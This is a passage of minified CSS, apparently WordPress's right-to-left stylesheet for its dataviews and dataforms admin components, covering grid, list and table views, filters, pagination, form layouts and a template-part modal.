.dataviews-filters__search-widget-filter-combobox__input::placeholder{color:#757575}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-cancel-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-decoration,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-decoration{-webkit-appearance:none}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon{align-items:center;bottom:0;display:flex;inset-inline-start:12px;justify-content:center;position:absolute;top:0;width:24px}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon:dir(ltr){transform:scaleX(-1)}.dataviews-filters__container-visibility-toggle{flex-shrink:0;position:relative}.dataviews-filters-toggle__count{background:var(--wp-admin-theme-color,#3858e9);border-radius:8px;box-sizing:border-box;color:#fff;font-size:11px;height:16px;left:0;line-height:16px;min-width:16px;outline:var(--wp-admin-border-width-focus) solid #fff;padding:0 4px;position:absolute;text-align:center;top:0;transform:translate(-50%,-50%)}.dataviews-search{width:fit-content}.dataviews-filters__user-input-widget{padding:16px}.dataviews-filters__user-input-widget .components-input-control__prefix{padding-right:8px}.dataviews-filters__search-widget-no-elements{align-items:center;display:flex;justify-content:center;padding:16px}.dataviews-footer{background-color:#fff;border-top:1px solid #f0f0f0;bottom:0;flex-shrink:0;padding:12px 48px;position:sticky;right:0}@media not (prefers-reduced-motion){.dataviews-footer{transition:padding .1s ease-out}}.dataviews-footer{z-index:2}@container (max-width: 430px){.dataviews-footer{padding:12px 24px}}@container (max-width: 560px){.dataviews-footer{flex-direction:column!important}.dataviews-footer .dataviews-bulk-actions-footer__container{width:100%}.dataviews-footer .dataviews-bulk-actions-footer__item-count{flex-grow:1}.dataviews-footer .dataviews-pagination{justify-content:space-between;width:100%}}.dataviews-pagination__page-select{font-size:11px;font-weight:500;text-transform:uppercase}@media (min-width:600px){.dataviews-pagination__page-select .components-select-control__input{font-size:11px!important;font-weight:500}}.dataviews-action-modal{z-index:1000001}.dataviews-picker-footer__bulk-selection{align-self:flex-start;height:32px}.dataviews-picker-footer__actions{align-self:flex-end}.dataviews-selection-checkbox{--checkbox-input-size:24px}@media (min-width:600px){.dataviews-selection-checkbox{--checkbox-input-size:16px}}.dataviews-selection-checkbox{flex-shrink:0;line-height:0}.dataviews-selection-checkbox .components-checkbox-control__input-container{margin:0}.dataviews-view-config{container-type:inline-size;font-size:13px;line-height:1.4;width:320px}.dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper{height:100%;overflow-y:scroll}.dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper .dataviews-view-config{width:auto}.dataviews-view-config__sort-direction .components-toggle-group-control-option-base{text-transform:uppercase}.dataviews-settings-section__title.dataviews-settings-section__title{font-size:15px;line-height:24px}.dataviews-settings-section__sidebar{grid-column:span 4}.dataviews-settings-section__content,.dataviews-settings-section__content>*{grid-column:span 8}.dataviews-settings-section__content .is-divided-in-two{display:contents}.dataviews-settings-section__content .is-divided-in-two>*{grid-column:span 4}.dataviews-settings-section:has(.dataviews-settings-section__content:empty){display:none}@container (max-width: 500px){.dataviews-settings-section.dataviews-settings-section{grid-template-columns:repeat(2,1fr)}.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__content,.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__sidebar{grid-column:span 2}}.dataviews-field-control__field{height:32px}.dataviews-field-control__actions{position:absolute;top:-9999em}.dataviews-field-control__actions.dataviews-field-control__actions{gap:4px}.dataviews-field-control__field.is-interacting .dataviews-field-control__actions,.dataviews-field-control__field:focus-within .dataviews-field-control__actions,.dataviews-field-control__field:hover .dataviews-field-control__actions{position:unset;top:unset}.dataviews-field-control__icon{display:flex;width:24px}.dataviews-field-control__label-sub-label-container{flex-grow:1}.dataviews-field-control__label{display:block}.dataviews-field-control__sub-label{color:#757575;font-size:11px;font-style:normal;margin-bottom:0;margin-top:8px}.dataviews-view-grid-items{container-type:inline-size;display:grid;gap:32px;grid-template-columns:repeat(auto-fill,minmax(230px,1fr));grid-template-rows:max-content;margin-bottom:auto;padding:0 48px 24px}@container (max-width: 430px){.dataviews-view-grid-items{padding-left:24px;padding-right:24px}}@media not (prefers-reduced-motion){.dataviews-view-grid-items{transition:padding .1s ease-out}}.dataviews-view-grid .dataviews-view-grid__card{height:100%;justify-content:flex-start;position:relative}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-actions{padding:8px 0 4px}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field{align-content:center;min-height:24px;overflow:hidden;text-align:start}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field--clickable{width:fit-content}.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{color:#1e1e1e}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after,.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-view-grid .dataviews-view-grid__media{aspect-ratio:1/1;background-color:#fff;border-radius:4px;overflow:hidden;position:relative;width:100%}.dataviews-view-grid .dataviews-view-grid__media img{height:100%;object-fit:cover;width:100%}.dataviews-view-grid .dataviews-view-grid__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;pointer-events:none;position:absolute;right:0;top:0;width:100%}.dataviews-view-grid .dataviews-view-grid__fields{font-size:12px;line-height:16px;position:relative}.dataviews-view-grid .dataviews-view-grid__fields:not(:empty){padding:0 0 12px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field-value:not(:empty){line-height:20px;min-height:24px;padding-top:2px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field{align-items:center;min-height:24px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-name{color:#757575;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:35%}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:65%}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field:not(:has(.dataviews-view-grid__field-value:not(:empty))){display:none}.dataviews-view-grid .dataviews-view-grid__badge-fields:not(:empty){padding-bottom:12px}.dataviews-view-grid__field-value:empty,.dataviews-view-grid__field:empty{display:none}.dataviews-view-grid__card .dataviews-selection-checkbox{opacity:0;position:absolute;right:8px;top:-9999em;z-index:1}@media not (prefers-reduced-motion){.dataviews-view-grid__card .dataviews-selection-checkbox{transition:opacity .1s linear}}@media (hover:none){.dataviews-view-grid__card .dataviews-selection-checkbox{opacity:1;top:8px}}.dataviews-view-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-grid__card:hover .dataviews-selection-checkbox{opacity:1;top:8px}.dataviews-view-grid__card .dataviews-view-grid__media-actions{left:4px;opacity:0;position:absolute;top:4px}.dataviews-view-grid__card .dataviews-view-grid__media-actions .dataviews-all-actions-button{background-color:#fff}@media not (prefers-reduced-motion){.dataviews-view-grid__card .dataviews-view-grid__media-actions{transition:opacity .1s linear}}@media (hover:none){.dataviews-view-grid__card .dataviews-view-grid__media-actions{opacity:1;top:4px}}.dataviews-view-grid__card .dataviews-view-grid__media-actions:has(.dataviews-all-actions-button[aria-expanded=true]),.dataviews-view-grid__card:focus-within .dataviews-view-grid__media-actions,.dataviews-view-grid__card:hover .dataviews-view-grid__media-actions{opacity:1}.dataviews-view-grid__media--clickable{cursor:pointer}.dataviews-view-grid__group-header{color:#1e1e1e;container-type:inline-size;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 48px}@container (max-width: 430px){.dataviews-view-grid__group-header{padding-left:24px;padding-right:24px}}div.dataviews-view-list{list-style-type:none}.dataviews-view-list{margin:0 0 auto}.dataviews-view-list div[role=article],.dataviews-view-list div[role=row]{border-top:1px solid #f0f0f0;margin:0}.dataviews-view-list div[role=article] .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row] .dataviews-view-list__item-wrapper{box-sizing:border-box;padding:16px 24px;position:relative}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions{display:flex;flex:0 0 auto;gap:4px;white-space:nowrap;width:max-content}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions .components-button,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions .components-button{position:relative;z-index:1}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>div,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>div{height:24px}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){flex:0;overflow:hidden;width:0}.dataviews-view-list div[role=article]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child){flex-basis:min-content;overflow:unset;width:auto}@media (hover:none){.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){flex-basis:min-content;overflow:unset;width:auto}}.dataviews-view-list div[role=article].is-selected.is-selected,.dataviews-view-list div[role=article].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=article].is-selected.is-selected+div[role=row],.dataviews-view-list div[role=row].is-selected.is-selected,.dataviews-view-list div[role=row].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=row].is-selected.is-selected+div[role=row]{border-top:1px solid rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-view-list div[role=article]:not(.is-selected) .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected) .dataviews-view-list__title-field{color:#1e1e1e}.dataviews-view-list div[role=article]:not(.is-selected).is-hovered,.dataviews-view-list div[role=article]:not(.is-selected):focus-within,.dataviews-view-list div[role=article]:not(.is-selected):hover,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered,.dataviews-view-list div[role=row]:not(.is-selected):focus-within,.dataviews-view-list div[role=row]:not(.is-selected):hover{background-color:#f8f8f8;color:var(--wp-admin-theme-color)}.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__title-field{color:var(--wp-admin-theme-color)}.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper{background-color:rgba(var(--wp-admin-theme-color--rgb),.04);color:#1e1e1e}.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field{color:var(--wp-admin-theme-color)}.dataviews-view-list .dataviews-view-list__item{appearance:none;background:none;border:none;cursor:pointer;inset:0;padding:0;position:absolute;scroll-margin:8px 0;z-index:1}.dataviews-view-list .dataviews-view-list__item:focus-visible{outline:none}.dataviews-view-list .dataviews-view-list__item:focus-visible:before{border-radius:2px;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";inset:var(--wp-admin-border-width-focus);outline:2px solid #0000;position:absolute}.dataviews-view-list .dataviews-view-list__title-field{flex:1;line-height:24px;min-height:24px;overflow:hidden}.dataviews-view-list .dataviews-view-list__title-field:has(a,button){z-index:1}.dataviews-view-list .dataviews-view-list__media-wrapper{background-color:#fff;border-radius:4px;flex-shrink:0;height:52px;overflow:hidden;position:relative;width:52px}.dataviews-view-list .dataviews-view-list__media-wrapper img{height:100%;object-fit:cover;width:100%}.dataviews-view-list .dataviews-view-list__media-wrapper:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;position:absolute;right:0;top:0;width:100%}.dataviews-view-list .dataviews-view-list__field-wrapper{flex-grow:1;min-height:52px}.dataviews-view-list .dataviews-view-list__fields{color:#757575;display:flex;flex-wrap:wrap;font-size:12px;gap:12px;row-gap:4px}.dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field:has(.dataviews-view-list__field-value:empty),.dataviews-view-list .dataviews-view-list__fields:empty{display:none}.dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field-value{align-items:center;display:flex;line-height:20px;min-height:24px}.dataviews-view-list+.dataviews-pagination{justify-content:space-between}.dataviews-view-list__group-header{color:#1e1e1e;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 24px}.dataviews-view-table{border-collapse:collapse;border-color:inherit;color:#757575;margin-bottom:auto;position:relative;text-indent:0;width:100%}.dataviews-view-table th{color:#1e1e1e;font-size:13px;font-weight:400;text-align:right}.dataviews-view-table td,.dataviews-view-table th{padding:12px}.dataviews-view-table td.dataviews-view-table__actions-column,.dataviews-view-table th.dataviews-view-table__actions-column{text-align:left}.dataviews-view-table td.dataviews-view-table__actions-column--sticky,.dataviews-view-table th.dataviews-view-table__actions-column--sticky{background-color:#fff;left:0;position:sticky}.dataviews-view-table td.dataviews-view-table__actions-column--stuck:after,.dataviews-view-table th.dataviews-view-table__actions-column--stuck:after{background-color:#f0f0f0;bottom:0;content:"";display:block;position:absolute;right:0;top:0;width:1px}.dataviews-view-table td.dataviews-view-table__checkbox-column,.dataviews-view-table th.dataviews-view-table__checkbox-column{padding-left:0}.dataviews-view-table td.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper,.dataviews-view-table th.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper{max-width:auto;min-width:auto}.dataviews-view-table tr{border-top:1px solid #f0f0f0}.dataviews-view-table tr .dataviews-view-table-header-button{gap:4px}.dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{padding-right:48px}.dataviews-view-table tr td:first-child .dataviews-view-table-header-button,.dataviews-view-table tr th:first-child .dataviews-view-table-header-button{margin-right:-8px}.dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{padding-left:48px}.dataviews-view-table tr:last-child{border-bottom:0}.dataviews-view-table tr.is-hovered,.dataviews-view-table tr.is-hovered .dataviews-view-table__actions-column--sticky{background-color:#f8f8f8}.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input{opacity:0}.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:checked,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:focus,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:indeterminate{opacity:1}.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:0}.dataviews-view-table tr.is-hovered .components-checkbox-control__input,.dataviews-view-table tr.is-hovered .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:focus-within .components-checkbox-control__input,.dataviews-view-table tr:focus-within .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:hover .components-checkbox-control__input,.dataviews-view-table tr:hover .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:1}@media (hover:none){.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input,.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:1}}.dataviews-view-table tr.is-selected{background-color:rgba(var(--wp-admin-theme-color--rgb),.04);color:#757575}.dataviews-view-table tr.is-selected,.dataviews-view-table tr.is-selected+tr{border-top:1px solid rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-view-table tr.is-selected:hover{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-table tr.is-selected .dataviews-view-table__actions-column--sticky{background-color:color-mix(in srgb,rgb(var(--wp-admin-theme-color--rgb)) 4%,#fff)}.dataviews-view-table tr.is-selected:hover .dataviews-view-table__actions-column--sticky{background-color:color-mix(in srgb,rgb(var(--wp-admin-theme-color--rgb)) 8%,#fff)}.dataviews-view-table thead{inset-block-start:0;position:sticky;z-index:1}.dataviews-view-table thead tr{border:0}.dataviews-view-table thead tr .components-checkbox-control__input.components-checkbox-control__input{opacity:1}.dataviews-view-table thead th{background-color:#fff;font-size:11px;font-weight:500;padding-bottom:8px;padding-right:12px;padding-top:8px;text-transform:uppercase}.dataviews-view-table thead th:has(.dataviews-view-table-header-button):not(:first-child){padding-right:4px}.dataviews-view-table tbody td{vertical-align:top}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper{align-items:center;display:flex;min-height:32px;white-space:nowrap}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-end{justify-content:flex-end}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-center{justify-content:center}.dataviews-view-table tbody .components-v-stack>.dataviews-view-table__cell-content-wrapper:not(:first-child){min-height:0}.dataviews-view-table .dataviews-view-table-header-button{font-size:11px;font-weight:500;padding:4px 8px;text-transform:uppercase}.dataviews-view-table .dataviews-view-table-header-button:not(:hover){color:#1e1e1e}.dataviews-view-table .dataviews-view-table-header-button span{speak:none}.dataviews-view-table .dataviews-view-table-header-button span:empty{display:none}.dataviews-view-table .dataviews-view-table-header{padding-right:4px}.dataviews-view-table .dataviews-view-table__actions-column{white-space:nowrap;width:auto}.dataviews-view-table:has(tr.is-selected) .components-checkbox-control__input{opacity:1}.dataviews-view-table.has-compact-density thead th:has(.dataviews-view-table-header-button):not(:first-child){padding-right:0}.dataviews-view-table.has-compact-density td,.dataviews-view-table.has-compact-density th{padding:4px 8px}.dataviews-view-table.has-comfortable-density td,.dataviews-view-table.has-comfortable-density th{padding:16px 12px}.dataviews-view-table.has-comfortable-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-comfortable-density th.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density th.dataviews-view-table__checkbox-column{padding-left:0}@container (max-width: 430px){.dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{padding-right:24px}.dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{padding-left:24px}}.dataviews-view-table-selection-checkbox{--checkbox-input-size:24px}@media (min-width:600px){.dataviews-view-table-selection-checkbox{--checkbox-input-size:16px}}.dataviews-column-primary__media{background-color:#fff;border-radius:4px;flex-shrink:0;max-width:60px;overflow:hidden;position:relative}.dataviews-column-primary__media img{height:100%;object-fit:cover;width:100%}.dataviews-column-primary__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;position:absolute;right:0;top:0;width:100%}.dataviews-view-table__cell-content-wrapper:not(.dataviews-column-primary__media),.dataviews-view-table__primary-column-content:not(.dataviews-column-primary__media){max-width:80ch;min-width:15ch}.dataviews-view-table__group-header-row .dataviews-view-table__group-header-cell{color:#1e1e1e;font-weight:500;padding:12px 48px}.dataviews-view-table col[class^=dataviews-view-table__col-]:not(.dataviews-view-table__col-primary){width:1%}.dataviews-view-picker-grid .dataviews-view-picker-grid__card{height:100%;justify-content:flex-start;position:relative}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-actions{padding:8px 0 4px}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field{align-content:center;min-height:24px;overflow:hidden;text-align:start}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field--clickable{width:fit-content}.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{color:#1e1e1e}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after,.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-view-picker-grid:focus-visible[aria-activedescendant]{outline:none}.dataviews-view-picker-grid:focus-visible [data-active-item=true]{outline:2px solid var(--wp-admin-theme-color)}.dataviews-view-picker-grid .dataviews-selection-checkbox{top:8px!important}.dataviews-view-picker-grid .dataviews-selection-checkbox input{pointer-events:none}.dataviews-view-picker-grid .dataviews-view-picker-grid__media{aspect-ratio:1/1;background-color:#fff;border-radius:4px;position:relative;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__media img{height:100%;object-fit:cover;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;pointer-events:none;position:absolute;right:0;top:0;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields{font-size:12px;line-height:16px;position:relative}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields:not(:empty){padding:0 0 12px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field-value:not(:empty){line-height:20px;min-height:24px;padding-top:2px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field{align-items:center;min-height:24px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-name{color:#757575;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:35%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:65%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field:not(:has(.dataviews-view-picker-grid__field-value:not(:empty))){display:none}.dataviews-view-picker-grid .dataviews-view-picker-grid__badge-fields:not(:empty){padding-bottom:12px}.dataviews-view-picker-grid__field-value:empty,.dataviews-view-picker-grid__field:empty{display:none}.dataviews-view-picker-grid__card .dataviews-selection-checkbox{position:absolute;right:8px;top:-9999em;z-index:1}@media (hover:none){.dataviews-view-picker-grid__card .dataviews-selection-checkbox{top:8px}}.dataviews-view-picker-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:hover .dataviews-selection-checkbox{top:8px}.dataviews-view-picker-grid__media--clickable{cursor:pointer}.dataviews-view-picker-grid-group__header{color:#1e1e1e;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 48px}.dataviews-controls__datetime{border:none;padding:0}.dataviews-controls__relative-date-number,.dataviews-controls__relative-date-unit{flex:1 1 50%}.dataviews-controls__date input[type=date]::-webkit-calendar-picker-indicator,.dataviews-controls__date input[type=date]::-webkit-inner-spin-button{-webkit-appearance:none;display:none}.dataviews-controls__date-preset{border:1px solid #ddd}.dataviews-controls__date-preset:active{background-color:#000}.dataforms-layouts-panel__field{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.dataforms-layouts-panel__field-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;width:38%}.dataforms-layouts-panel__field-label--label-position-side{align-self:center}.dataforms-layouts-panel__field-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.dataforms-layouts-panel__field-control .components-button{max-width:100%;min-height:32px;text-align:right;text-wrap:balance;text-wrap:pretty;white-space:normal}.dataforms-layouts-panel__field-control.components-button.is-link[aria-disabled=true]{text-decoration:none}.dataforms-layouts-panel__field-control .components-dropdown{max-width:100%}.dataforms-layouts-panel__field-dropdown .components-popover__content{min-width:320px;padding:16px}.dataforms-layouts-panel__dropdown-header{margin-bottom:16px}.dataforms-layouts-panel__modal-footer{margin-top:16px}.components-popover.components-dropdown__content.dataforms-layouts-panel__field-dropdown{z-index:159990}.dataforms-layouts-regular__field{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.dataforms-layouts-regular__field-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;width:38%}.dataforms-layouts-regular__field-label--label-position-side{align-self:center}.dataforms-layouts-regular__field-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.dataforms-layouts-card__field-header-label{font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:15px;font-weight:500;line-height:20px}.dataforms-layouts-card__field{width:100%}.dataforms-layouts-card__field-description{color:#757575;display:block;font-size:13px;margin-bottom:16px}.dataforms-layouts-card__field-summary{display:flex;flex-direction:row;gap:16px}.dataforms-layouts-row__field-control{width:100%}.dataforms-layouts__wrapper{font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px}:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.fields-create-template-part-modal{z-index:1000001}.fields-create-template-part-modal__area-fieldset{border:0;margin:0;padding:0}.fields-create-template-part-modal__area-radio-group{border:1px solid #949494;border-radius:2px}.fields-create-template-part-modal__area-radio-wrapper{align-items:center;display:grid;grid-template-columns:min-content 1fr min-content;padding:12px;position:relative;grid-gap:4px 8px;color:#1e1e1e}.fields-create-template-part-modal__area-radio-wrapper+.fields-create-template-part-modal__area-radio-wrapper{border-top:1px solid #949494}.fields-create-template-part-modal__area-radio-wrapper input[type=radio]{opacity:0;position:absolute}.fields-create-template-part-modal__area-radio-wrapper:has(input[type=radio]:checked){z-index:1}.fields-create-template-part-modal__area-radio-wrapper:has(input[type=radio]:not(:checked)):hover{color:var(--wp-admin-theme-color)}.fields-create-template-part-modal__area-radio-wrapper>:not(.fields-create-template-part-modal__area-radio-label){pointer-events:none}.fields-create-template-part-modal__area-radio-label:before{content:"";inset:0;position:absolute}input[type=radio]:not(:checked)~.fields-create-template-part-modal__area-radio-label:before{cursor:pointer}input[type=radio]:focus-visible~.fields-create-template-part-modal__area-radio-label:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:4px solid #0000}.fields-create-template-part-modal__area-radio-checkmark,.fields-create-template-part-modal__area-radio-icon{fill:currentColor}input[type=radio]:not(:checked)~.fields-create-template-part-modal__area-radio-checkmark{opacity:0}.fields-create-template-part-modal__area-radio-description{color:#757575;font-size:12px;grid-column:2/3;line-height:normal;margin:0;text-wrap:pretty}input[type=radio]:not(:checked):hover~.fields-create-template-part-modal__area-radio-description{color:inherit}.fields-controls__slug{border:0;margin:0;padding:0}.fields-controls__slug .fields-controls__slug-external-icon{margin-right:5ch}.fields-controls__slug .fields-controls__slug-input 